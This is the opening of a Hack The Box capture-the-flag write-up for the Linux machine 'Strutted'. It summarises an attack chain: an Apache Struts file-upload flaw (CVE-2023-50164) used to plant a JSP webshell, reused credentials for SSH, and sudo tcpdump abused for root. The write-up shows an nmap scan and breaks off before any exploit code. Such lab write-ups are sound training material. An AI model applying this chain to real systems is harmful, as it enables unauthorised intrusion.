Platform: Hack The Box
Season: 9
Difficulty: Medium
OS: Linux
Date: 2025-10-30
Author: x4cc3
Strutted is a Medium Linux machine hosting a Java web application built on Apache Struts 6.3.0.1. An arbitrary file upload vulnerability (CVE-2023-50164) is exploited to deploy a JSP webshell, leading to code execution as the tomcat user. Credentials are recovered from tomcat-users.xml and reused for SSH access as james. For root, the user's sudo permission on tcpdump is leveraged via a -z post-rotate script to drop a SUID bash binary.
sudo nmap -Pn -sC -sV -T4 -O 10.10.11.59
| Port | Service | Version |
|---|---|---|
| 22/tcp | SSH | OpenSSH 8.9p1 (Ubuntu) |
| 80/tcp | HTTP | nginx 1.18.0 (Ubuntu) |
The web server title indicated "Strutted — Instant Image Uploads" and offered a downloadable Java application.
Landing page
Download app button
Downloading and inspecting the Java application revealed: